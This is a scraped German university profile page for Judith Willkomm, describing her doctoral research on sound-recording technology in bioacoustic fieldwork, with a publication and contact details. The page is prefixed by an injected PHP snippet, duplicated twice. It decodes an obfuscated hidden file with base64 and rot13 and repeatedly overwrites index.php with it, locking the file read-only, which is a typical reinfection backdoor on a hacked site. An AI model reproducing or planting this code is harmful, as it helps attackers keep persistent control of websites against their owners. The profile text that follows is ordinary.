$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Judith Willkomm – Auditive Medienkulturen

Judith Willkomm

Promotionsvorhaben:

Mein Promotionsprojekt beschäftigt sich mit dem Einsatz von Tonaufnahmegeräten in bioakustischer Feldforschung.

Ziel des Projektes ist es

  1. den wechselseitigen Einfluss von Medientechnologien und Forschungsthemen in den Feldwissenschaften am Beispiel der Bioakustik nachzuzeichnen (historische Praxeologie) und
  2. das Verhältnis zwischen forschendem Ohr und schallspeicherndem Gerät anhand von empirischem Material (ethnografischen Methoden der Teilnehmenden Beobachtung) abzubilden

Publikationen:

„Die Technik gibt den Ton an. Zur auditiven Medienkultur der Bioakustik“, in: Volmar, Axel/Schröter, Jens (Hg.): Auditive Medienkulturen. Techniken des Hörens und Praktiken der Klanggestaltung. transcript Verlag, Bielefeld 2013.

Kontakt:

Judith Willkomm

Wissenschaftliche Mitarbeiterin im
SFB Medien der Kooperation

Universität Siegen
Herrengarten 3
57072 Siegen

Tel.: 0271/740-3063

E-Mail: willkomm@locatingmedia.uni-siegen.de